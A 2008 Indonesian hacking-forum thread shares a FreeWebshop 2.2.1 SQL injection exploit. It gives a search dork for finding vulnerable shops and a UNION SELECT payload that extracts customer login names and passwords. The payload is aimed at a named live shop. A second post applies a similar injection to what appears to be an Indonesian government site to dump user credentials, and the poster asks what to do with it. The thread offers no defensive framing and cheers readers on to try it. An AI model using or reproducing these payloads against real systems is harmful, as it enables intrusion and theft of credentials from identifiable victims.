FreeWebshop 2.2.1 Remote Blind SQL Injection Exploit

juniorsev3n · by juniorsev3n on Thu Feb 21, 2008 4:17 pm

google dork: "Powered by FreeWebshop.org 2.2.1"
contohwebsite: http://www.atelierinderoos.nl/
bug: index.php?page=browse&action=list&group=0&cat=-1/**/UNION/**/SELECT/**/null,concat(loginname,0x3a,password),null/**/from/**/customer/**/limit/**/0,1/*&orderby=DESCRIPTION

====
jadi
http://www.atelierinderoos.nl/index.php?page=browse&action=list&group=0&cat=-1/**/UNION/**/SELECT/**/null,concat(loginname,0x3a,password),null/**/from/**/customer/**/limit/**/0,1/*&orderby=DESCRIPTION

===
keterangan lengkap di
http://milw0rm.com/exploits/4740

maap bug lama tapi enak ni blind sql injection
===
selamat mencoba

juniorsev3n · by juniorsev3n on Thu Feb 21, 2008 4:52 pm

aduh
aura cms
dapet euy

http://www.banjar-jabar.go.id/redesign/index.php?pilih=links&mod=yes&aksi=lihat&kategori=&kid=-999'union+select+concat(0x74346d7520,user,0x20673074),0,0,concat(0x67656c347020,password,0x20673074),0,0,0,0,0,0%20from%20user+limit+0,1/*

situs pemerintah tuh?
mau diapain>

FreeWebshop 2.2.1 Remote Blind SQL Injection Exploit

FreeWebshop 2.2.1 Remote Blind SQL Injection Exploit

Re: FreeWebshop 2.2.1 Remote Blind SQL Injection Exploit